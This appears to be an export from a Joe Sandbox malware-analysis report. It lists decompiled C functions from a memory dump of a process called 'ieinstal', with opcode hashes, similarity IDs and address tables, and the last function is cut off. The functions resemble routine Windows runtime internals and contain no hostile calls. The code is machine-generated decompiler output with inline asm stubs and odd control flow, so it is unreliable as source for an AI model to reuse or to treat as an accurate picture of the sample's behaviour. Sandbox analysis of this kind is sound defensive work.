0x1efbcb96
0x1efbcb9f
0x1efbcba2
0x1efbcba4
0x1efbcbb2
0x1efbcbb7
0x1efbcbb7
0x1efbcbbc
0x00000000
0x1efbcbc2
0x1efbcbc4
0x1f01a157
0x00000000
0x1f01a157
0x1efbcbe0
0x1efbcbe4
0x00000000
0x1efbcbe4
0x1efbcbbc

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75f7356f376b215d1c8e41e0ee5735b406fecc07d4fc25f329d1287a1e184bf5
Instruction ID: 19babeef21b3df2061e819d7acce7e8815a9f85ebde21e8070ee2400261cb2a3
Opcode Fuzzy Hash: 75f7356f376b215d1c8e41e0ee5735b406fecc07d4fc25f329d1287a1e184bf5
Instruction Fuzzy Hash: FC21F536E04246ABDB10DBB68821BEFB7B9AF45750F0685369D54EB240E371D94087A0

Uniqueness

Uniqueness Score: -1.00%

Function 1F07BF4D Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1F07BF4D(void* __ecx, void* __edx, intOrPtr _a4, char _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t50;
				intOrPtr _t51;
				signed int _t52;
				signed int _t54;
				void* _t57;
				void* _t61;
				void* _t62;

				_t57 = __edx;
				_t61 = 0;
				_t62 = __ecx;
				if(__edx < 1) {
					_t57 = 4;
				}
				_t50 = _a4;
				if(_t50 < 1) {
					_t50 = 0x28;
				}
				if(_t62 != 0 && _t57 >= 1 && _t50 >= 1) {
					_t48 = _t57;
					if(_t57 >= ( *(_t62 + 6) & 0x0000ffff)) {
						_t51 = _t50;
						_v8 = _t51;
						if(_t51 >= ( *(_t62 + 0xa) & 0x0000ffff)) {
							_t52 = 2;
							if(E1EFF4CF8( &_v12, ( *(_t62 + 4) & 0x0000ffff) * _t52, ( *(_t62 + 4) & 0x0000ffff) * _t52 >> 0x20) >= 0) {
								_t54 = 2;
								if(E1EFF4CF8( &_v16, ( *(_t62 + 8) & 0x0000ffff) * _t54, ( *(_t62 + 8) & 0x0000ffff) * _t54 >> 0x20) >= 0) {
									_t61 = E1EFBDB8D(_t48, _v8);
									if(_t61 != 0) {
										E1F0088C0( *((intOrPtr*)(_t61 + 0xc)),  *((intOrPtr*)(_t62 + 0xc)), _v12);
										E1F0088C0( *((intOrPtr*)(_t61 + 0x10)),  *((intOrPtr*)(_t62 + 0x10)), _v16);
										 *((short*)(_t61 + 6)) =  *(_t62 + 6);
										 *((short*)(_t61 + 0xa)) =  *(_t62 + 0xa);
										if(_a8 == 0) {
											E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t62);
										}
									}
								}
							}
						}
					}
				}
				return _t61;
			}

0x1f07bf4d
0x1f07bf5b
0x1f07bf5d
0x1f07bf62
0x1f07bf66
0x1f07bf66
0x1f07bf67
0x1f07bf6d
0x1f07bf71
0x1f07bf71
0x1f07bf74
0x1f07bf90
0x1f07bf95
0x1f07bf9f
0x1f07bfa2
0x1f07bfa7
0x1f07bfb3
0x1f07bfc2
0x1f07bfca
0x1f07bfd9
0x1f07bfe5
0x1f07bfe9
0x1f07bff4
0x1f07c005
0x1f07c015
0x1f07c01d
0x1f07c021
0x1f07c02f
0x1f07c02f
0x1f07c021
0x1f07bfe9
0x1f07bfd9
0x1f07bfc2
0x1f07bfa7
0x1f07bf95
0x1f07c03a

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 913e4e62fe5ed1eb351d392b489c690631754249b42677e026e479e93032757f
Instruction ID: c23025b186f2ab303793b700d17408b5c6dd3cb757431acba6dbb10cdb5b1606
Opcode Fuzzy Hash: 913e4e62fe5ed1eb351d392b489c690631754249b42677e026e479e93032757f
Instruction Fuzzy Hash: 6A21F73A601ED1A6CB24DBA58C10BBBBBA4EF40750F40C55EFAD58A590EB31F941C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC6D91 Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E1EFC6D91(void* __ecx, signed int __edx, signed int _a4, char _a8) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t34;
				void* _t48;
				signed int _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t58;
				void* _t59;
				void* _t61;
				signed int _t62;

				_t56 = __edx;
				_v8 =  *0x1f0bb370 ^ _t62;
				_t61 = __ecx;
				_t51 =  *((intOrPtr*)(__edx + 0xc8));
				_t58 = _a4;
				_v24 = _t51;
				_t34 =  *((intOrPtr*)(__ecx + 0x104));
				if(_t58 != _t51) {
					if(_t34 == 0xffffffff) {
						if( *((char*)(__edx + 0xd0)) == 0) {
							 *((char*)(__edx + 0xd0)) = 1;
						} else {
							asm("lock dec dword [eax+ecx*4]");
						}
						asm("lock inc dword [eax+edi*4]");
					}
					 *(_t56 + 0xc8) = _t58;
					_t52 =  *((intOrPtr*)(_t61 + 0x20));
					_push(_t48);
					_t49 =  *(_t58 * 0xc + _t52 + 4) & 0x0000ffff;
					_v28 =  *(_v24 * 0xc + _t52 + 4) & 0x0000ffff;
					if(E1EFD3C40() == 0) {
						_t34 = 0x7ffe0386;
					} else {
						_t34 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					}
					if( *_t34 != 0) {
						_t56 = _v24;
						_t34 = E1F0951B6(_t61, _v24, _t58, _v28, _t49);
					}
					if(_v28 != _t49) {
						asm("stosd");
						_push(0xc);
						asm("stosd");
						asm("stosd");
						_v20 = _v20 & 0x00000000;
						_push( &_v20);
						_push(0x1e);
						_push(0xfffffffe);
						_v16 = _t49;
						E1F002A60();
						_push(4);
						_push( &_a8);
						_push(0xd);
						_push(0xfffffffe);
						_t34 = E1F002A60();
					}
					_pop(_t48);
				} else {
					if(_t34 == 0xffffffff) {
						if( *((char*)(__edx + 0xd0)) == 0) {
							 *((char*)(__edx + 0xd0)) = 1;
							_t34 =  *((intOrPtr*)(__ecx + 0x1c));
							asm("lock inc dword [eax+edi*4]");
						}
					}
				}
				_pop(_t59);
				return E1F004B50(_t34, _t48, _v8 ^ _t62, _t56, _t59, _t61);
			}

0x1efc6d91
0x1efc6da0
0x1efc6da4
0x1efc6da6
0x1efc6dad
0x1efc6db0
0x1efc6db3
0x1efc6dbb
0x1f0213ca
0x1f0213d3
0x1f0213de
0x1f0213d5
0x1f0213d8
0x1f0213d8
0x1f0213e8
0x1f0213e8
0x1f0213ef
0x1f0213f5
0x1f0213f8
0x1f0213f9
0x1f021407
0x1f021411
0x1f021423
0x1f021413
0x1f02141c
0x1f02141c
0x1f02142b
0x1f02142d
0x1f021437
0x1f021437
0x1f021440
0x1f021447
0x1f021448
0x1f02144a
0x1f02144b
0x1f02144f
0x1f021453
0x1f021454
0x1f021456
0x1f021458
0x1f02145c
0x1f021461
0x1f021466
0x1f021467
0x1f021469
0x1f02146b
0x1f02146b
0x1f021470
0x1efc6dc1
0x1efc6dc4
0x1f0213ae
0x1f0213b4
0x1f0213bb
0x1f0213be
0x1f0213be
0x1f0213ae
0x1efc6dc4
0x1efc6dcd
0x1efc6dd7

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe91b92d70308928a209e4aca9c96c24a6673437bc8b0a74e7ea9a1c288f0feb
Instruction ID: 7eb8294030de47e27c3c5fce1fa2159ef17a247074ffb7e75e57fb4f95691247
Opcode Fuzzy Hash: fe91b92d70308928a209e4aca9c96c24a6673437bc8b0a74e7ea9a1c288f0feb
Instruction Fuzzy Hash: E531C23590020AABD720DFA8C980FAEF7F5BF41314F1503AAE9199B1D1DB74A985C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 1EFF1B9C Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E1EFF1B9C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1f0b41e8; // 0x6a
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				L1EFD2330(0xd, 0x9b3856e0);
				_t41 =  *0x1f0b41e0; // 0x0
				if(_t41 != 0) {
					 *0x1f0b41e0 =  *_t41;
					 *0x1f0b41e4 =  *0x1f0b41e4 + 0xffff;
				}
				E1EFD24D0(0x9b3856e0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x1f0b41ec], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = E1EFD5D90(0x1f0b41e8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1f0b41e8]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x1eff1ba6
0x1eff1bb2
0x1eff1bb5
0x1eff1bba
0x1eff1ca3
0x00000000
0x00000000
0x00000000
0x00000000
0x1eff1bc0
0x1eff1bc0
0x1eff1bc8
0x1eff1bca
0x1eff1bd0
0x00000000
0x00000000
0x1f031c49
0x1f031c4d
0x00000000
0x00000000
0x00000000
0x1f031c53
0x1eff1be9
0x1eff1bee
0x1eff1bf6
0x1eff1c84
0x1eff1c8e
0x1eff1c8e
0x1eff1bfd
0x1eff1c04
0x1eff1c2d
0x1eff1c3a
0x1eff1c3b
0x1eff1c3c
0x1eff1c3d
0x1eff1c3e
0x1eff1c44
0x1eff1c5a
0x1eff1c5e
0x1eff1c62
0x1eff1c70
0x1eff1c74
0x00000000
0x1eff1c06
0x1eff1c1b
0x1eff1c1f
0x1eff1c9a
0x1eff1c9a
0x1eff1c79
0x00000000
0x1eff1c79
0x1eff1c21
0x1eff1c25
0x1eff1c2b
0x00000000
0x00000000
0x00000000
0x1eff1c2b

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31e31c771acf279fb66646479e3993417e027d747471bde4268aef7671cf2a2a
Instruction ID: f656d5f3cfcded6307865c71fdff61b9d5b20096c4d8e3176ffea9f7cb5f7b0c
Opcode Fuzzy Hash: 31e31c771acf279fb66646479e3993417e027d747471bde4268aef7671cf2a2a
Instruction Fuzzy Hash: A831DF7EA10661DBCB01DF58C4E07DA77E4EB2A320F424669ED449B212E776DA068B90

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC3E14 Relevance: .1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E1EFC3E14(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E1EFC4D00();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = E1EFD5D90(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E1EFC4D00() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x1efc3e21
0x1efc3e24
0x1efc3e26
0x1efc3e2b
0x1efc3e2d
0x1efc3e35
0x1efc3e3e
0x1efc3e3f
0x1efc3e40
0x1efc3e44
0x1efc3e47
0x1efc3e4e
0x1efc3e4f
0x1efc3e55
0x1efc3e56
0x1efc3e5d
0x1efc3e77
0x00000000
0x00000000
0x1efc3e6a
0x1efc3e6f
0x1efc3e6f
0x1efc3e5f
0x1efc3e5f
0x1efc3e64
0x1efc3e7b
0x1efc3e80
0x1f01ffec
0x1f01fff0
0x00000000
0x00000000
0x1f01fff6
0x1f01fff6
0x1efc3e89
0x1efc3e8a
0x1efc3e8b
0x1efc3e8c
0x1efc3e8e
0x1efc3e8f
0x1efc3e92
0x1efc3e9a
0x1f020000
0x1f02001a
0x1f02001a
0x00000000
0x1f020000
0x1efc3ea6
0x1efc3eab
0x1efc3eab
0x1efc3e68
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0754c3be93d9ba11ea9134f78665c87217d52e306ea01fe2339886d40d526197
Instruction ID: f0fac5c05d97505609373a9b218a2f403548e1e5549c99a74582ef6c5c6ef9a7
Opcode Fuzzy Hash: 0754c3be93d9ba11ea9134f78665c87217d52e306ea01fe2339886d40d526197
Instruction Fuzzy Hash: CC21A13660121AEFC711DF99CCA0E9BBBB9EF55680F214599F90197250D331EE05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1F067ABE Relevance: .1, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1F067ABE(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t45;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t54;
				intOrPtr _t57;
				signed char _t60;
				intOrPtr _t69;
				signed int _t71;
				signed int _t73;
				signed int _t75;
				void* _t78;

				_t69 = __edx;
				_push(0x1c);
				_push(0x1f09d230);
				E1F017BE4(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t78 - 0x24)) = __edx;
				 *((intOrPtr*)(_t78 - 0x1c)) = __ecx;
				_t45 =  *[fs:0x30];
				 *((intOrPtr*)(_t78 - 0x2c)) = _t45;
				_t75 = 0;
				 *((intOrPtr*)(_t78 - 0x28)) = 0;
				_t60 =  *(_t78 + 8);
				if((_t60 & 0x00000001) == 0) {
					E1EFCFED0(0x1f0b4800);
					_t45 =  *((intOrPtr*)(_t78 - 0x2c));
					_t69 =  *((intOrPtr*)(_t78 - 0x24));
				}
				 *(_t78 - 4) = _t75;
				_t71 = _t75;
				 *(_t78 - 0x20) = _t71;
				while(_t71 <  *((intOrPtr*)(_t45 + 0x88))) {
					 *0x1f0b91e0( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x90)) + _t71 * 4)), _t69);
					_t57 =  *((intOrPtr*)(_t78 - 0x1c))();
					 *((intOrPtr*)(_t78 - 0x28)) = _t57;
					if(_t57 >= 0) {
						_t71 = _t71 + 1;
						 *(_t78 - 0x20) = _t71;
						_t45 =  *((intOrPtr*)(_t78 - 0x2c));
						_t69 =  *((intOrPtr*)(_t78 - 0x24));
						continue;
					}
					L15:
					 *(_t78 - 4) = 0xfffffffe;
					E1F067BC1(_t60);
					 *[fs:0x0] =  *((intOrPtr*)(_t78 - 0x10));
					return  *((intOrPtr*)(_t78 - 0x28));
				}
				if((_t60 & 0x00000002) != 0) {
					_t73 = _t75;
					while(1) {
						 *(_t78 - 0x20) = _t73;
						if(_t73 >= ( *0x1f0b6624 & 0x0000ffff)) {
							goto L11;
						}
						_t52 =  *0x1f0b3734; // 0x77254820
						 *0x1f0b91e0( *((intOrPtr*)(_t52 + _t73 * 4)), _t69);
						_t54 =  *((intOrPtr*)(_t78 - 0x1c))();
						 *((intOrPtr*)(_t78 - 0x28)) = _t54;
						if(_t54 >= 0) {
							_t73 = _t73 + 1;
							_t69 =  *((intOrPtr*)(_t78 - 0x24));
							continue;
						}
						goto L15;
					}
					while(1) {
						L11:
						 *(_t78 - 0x20) = _t75;
						if(_t75 >= 3) {
							goto L15;
						}
						_t49 =  *((intOrPtr*)(0x1f0b8a10 + _t75 * 8));
						 *((intOrPtr*)(_t78 - 0x2c)) = _t49;
						if(_t49 == 0) {
							L14:
							_t75 =  *(_t78 - 0x20) + 1;
							_t69 =  *((intOrPtr*)(_t78 - 0x24));
							continue;
						} else {
							 *0x1f0b91e0(_t49, _t69);
							_t51 =  *((intOrPtr*)(_t78 - 0x1c))();
							 *((intOrPtr*)(_t78 - 0x28)) = _t51;
							if(_t51 >= 0) {
								goto L14;
							}
						}
						goto L15;
					}
				}
				goto L15;
			}

0x1f067abe
0x1f067abe
0x1f067ac0
0x1f067ac5
0x1f067aca
0x1f067acd
0x1f067ad0
0x1f067ad6
0x1f067ad9
0x1f067adb
0x1f067ade
0x1f067ae4
0x1f067aeb
0x1f067af3
0x1f067af6
0x1f067af6
0x1f067af9
0x1f067afc
0x1f067afe
0x1f067b01
0x1f067b13
0x1f067b19
0x1f067b1c
0x1f067b21
0x1f067b23
0x1f067b24
0x1f067b2a
0x1f067b2d
0x00000000
0x1f067b2d
0x1f067b9d
0x1f067b9d
0x1f067ba4
0x1f067baf
0x1f067bbb
0x1f067bbb
0x1f067b35
0x1f067b37
0x1f067b39
0x1f067b39
0x1f067b45
0x00000000
0x00000000
0x1f067b48
0x1f067b50
0x1f067b56
0x1f067b59
0x1f067b5e
0x1f067b60
0x1f067b64
0x00000000
0x1f067b64
0x00000000
0x1f067b5e
0x1f067b69
0x1f067b69
0x1f067b69
0x1f067b6f
0x00000000
0x00000000
0x1f067b71
0x1f067b78
0x1f067b7d
0x1f067b91
0x1f067b94
0x1f067b98
0x00000000
0x1f067b7f
0x1f067b81
0x1f067b87
0x1f067b8a
0x1f067b8f
0x00000000
0x00000000
0x1f067b8f
0x00000000
0x1f067b7d
0x1f067b69
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62f366511649d9a72550e064094fd44357f1e217601166d0e4022b10c0ab6b81
Instruction ID: 7710e43d32188991bc8a548a37a4029d31319898116d685d0d79acb04cfc148a
Opcode Fuzzy Hash: 62f366511649d9a72550e064094fd44357f1e217601166d0e4022b10c0ab6b81
Instruction Fuzzy Hash: 0231D4B5E0021ACBCB04CFA9C884ADDFBF5BF4C720F15912AD911B3250EB35A941DB64

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC3CF0 Relevance: .1, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1EFC3CF0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t36;
				intOrPtr _t45;
				signed int* _t47;
				void* _t52;
				signed int _t55;
				intOrPtr _t57;
				signed int _t60;
				void* _t61;

				_t58 = __esi;
				_push(0x18);
				_push(0x1f09bc60);
				E1F017BE4(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t61 - 0x1c)) = 0xc0000001;
				_t45 =  *((intOrPtr*)(_t61 + 0x14));
				if(_t45 != 0) {
					_t55 =  *(_t45 + 0x1c);
				} else {
					_t55 = 0;
				}
				_t47 =  *(_t61 + 8);
				if(_t47 == 0 ||  *((intOrPtr*)(_t61 + 0xc)) == 0 || (_t55 & 0xfffffffc) != 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					E1F094A6D(_t45, _t47, _t52, _t55, _t58);
					_t33 = 0xc000000d;
				} else {
					 *_t47 =  *_t47 & 0x00000000;
					_t36 =  *0x1f0b6644; // 0x0
					_t60 = E1EFD5D90(_t47,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t36 + 0x00200000 | 0x00000008, 0x90);
					 *(_t61 - 0x20) = _t60;
					 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
					 *((intOrPtr*)(_t61 - 0x24)) = 1;
					_t71 = _t60;
					if(_t60 == 0) {
						_t57 = 0xc0000017;
						 *((intOrPtr*)(_t61 - 0x1c)) = 0xc0000017;
					} else {
						_t60 =  *(_t61 - 0x20);
						 *((intOrPtr*)(_t60 + 0x6c)) =  *((intOrPtr*)(_t61 + 4));
						_push(0x1ef91080);
						_push(0x1ef9114c);
						_push(_t55);
						_push(_t45);
						_t57 = E1EFC496B(_t45, _t60, _t55, _t60, _t71);
						 *((intOrPtr*)(_t61 - 0x1c)) = _t57;
						if(_t57 >= 0) {
							_t40 =  *((intOrPtr*)(_t61 + 0xc));
							 *((intOrPtr*)(_t60 + 0x30)) =  *((intOrPtr*)(_t61 + 0xc));
							_t57 = 0;
							 *((intOrPtr*)(_t61 - 0x1c)) = 0;
							if(_t45 != 0) {
								_t40 =  *((intOrPtr*)(_t45 + 0x18));
								 *((intOrPtr*)(_t60 + 0x10)) =  *((intOrPtr*)(_t45 + 0x18));
							}
							_t74 =  *((intOrPtr*)(_t60 + 8)) - _t57;
							if( *((intOrPtr*)(_t60 + 8)) != _t57) {
								_t40 = E1EFF73B3(_t45, _t60, _t57, _t60, _t74);
							}
						}
					}
					 *(_t61 - 4) = 0xfffffffe;
					 *((intOrPtr*)(_t61 - 0x24)) = 0;
					E1EFC3E01(_t40, _t57, _t60);
					if(_t57 >= 0) {
						 *( *(_t61 + 8)) = _t60;
					}
					_t33 = _t57;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0x10));
				return _t33;
			}

0x1efc3cf0
0x1efc3cf0
0x1efc3cf2
0x1efc3cf7
0x1efc3cfc
0x1efc3d03
0x1efc3d08
0x1efc3df9
0x1efc3d0e
0x1efc3d0e
0x1efc3d0e
0x1efc3d10
0x1efc3d15
0x1f01ffcc
0x1f01ffd1
0x1efc3d44
0x1efc3d44
0x1efc3d47
0x1efc3d68
0x1efc3d6a
0x1efc3d6d
0x1efc3d71
0x1efc3d78
0x1efc3d7a
0x1f01ff88
0x1f01ff8d
0x1efc3d80
0x1efc3d83
0x1efc3d86
0x1efc3d89
0x1efc3d8e
0x1efc3d93
0x1efc3d94
0x1efc3d9f
0x1efc3da1
0x1efc3da6
0x1efc3da8
0x1efc3dab
0x1efc3dae
0x1efc3db0
0x1efc3db5
0x1efc3db7
0x1efc3dba
0x1efc3dba
0x1efc3dbd
0x1efc3dc0
0x1efc3dc4
0x1efc3dc4
0x1efc3dc0
0x1efc3da6
0x1efc3dc9
0x1efc3dd0
0x1efc3dd7
0x1efc3dde
0x1efc3de3
0x1efc3de3
0x1efc3de5
0x1efc3de5
0x1efc3dea
0x1efc3df6

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 232af8a958d3d77c7ee5f7442dfcdebcef370e943e89b92b49f71b6bb02ccbda
Instruction ID: 5f3e48fd181e00f5183e42114321108b15fa63938c9ccc24e0aad0bc4c71cc0a
Opcode Fuzzy Hash: 232af8a958d3d77c7ee5f7442dfcdebcef370e943e89b92b49f71b6bb02ccbda
Instruction Fuzzy Hash: A031AC76A0165A8BDB00CF55C890B8ABBF1EF84764F21465EEC159B380D775EA01CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC8C79 Relevance: .1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E1EFC8C79(signed char __ecx, intOrPtr* __edx) {
				intOrPtr* _v8;
				void* _t18;
				char* _t21;
				signed char* _t23;
				signed int _t24;
				signed int _t25;
				intOrPtr _t26;
				signed char _t30;
				intOrPtr* _t33;
				void* _t36;
				void* _t39;
				char* _t42;
				signed char* _t46;

				_push(__ecx);
				_v8 = __edx;
				_t30 = __ecx;
				_t18 = E1EFD3C40();
				_t42 = 0x7ffe0384;
				if(_t18 != 0) {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t21 = 0x7ffe0384;
				}
				_t46 = 0x7ffe0385;
				if( *_t21 != 0) {
					if(E1EFD3C40() == 0) {
						_t23 = 0x7ffe0385;
					} else {
						_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t23 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t26 = E1EFD3C40();
					if(_t26 != 0) {
						_t26 =  *[fs:0x30];
						_t42 =  *((intOrPtr*)(_t26 + 0x50)) + 0x22a;
					}
					if( *_t42 != 0) {
						_t26 =  *[fs:0x30];
						if(( *(_t26 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t26 = E1EFD3C40();
						if(_t26 != 0) {
							_t26 =  *[fs:0x30];
							_t46 =  *((intOrPtr*)(_t26 + 0x50)) + 0x22b;
						}
						if(( *_t46 & 0x00000020) == 0) {
							goto L5;
						}
						L17:
						_t47 = _v8;
						_t33 = _v8;
						_t39 = _t33 + 2;
						do {
							_t24 =  *_t33;
							_t33 = _t33 + 2;
						} while (_t24 != 0);
						_t25 = _t24 | 0xffffffff;
						_t36 = (_t33 - _t39 >> 1) + (_t33 - _t39 >> 1);
						if((_t30 & 0x00000002) == 0) {
							if((_t30 & 0x00000001) == 0) {
								L24:
								_t26 = E1F040AFF(_t30, 0, _t25, _t36, _t47);
								goto L5;
							}
							_push(6);
							L23:
							_pop(_t25);
							goto L24;
						}
						_push(5);
						goto L23;
					} else {
						L5:
						return _t26;
					}
				}
			}

0x1efc8c7e
0x1efc8c82
0x1efc8c85
0x1efc8c87
0x1efc8c8c
0x1efc8c93
0x1f02222d
0x1efc8c99
0x1efc8c99
0x1efc8c99
0x1efc8c9e
0x1efc8ca3
0x1f02223e
0x1f022250
0x1f022240
0x1f022249
0x1f022249
0x1f022255
0x00000000
0x1f022257
0x00000000
0x1f022257
0x1efc8ca9
0x1efc8ca9
0x1efc8ca9
0x1efc8cb0
0x1f02225c
0x1f022265
0x1f022265
0x1efc8cb9
0x1f022270
0x1f02227d
0x00000000
0x00000000
0x1f022283
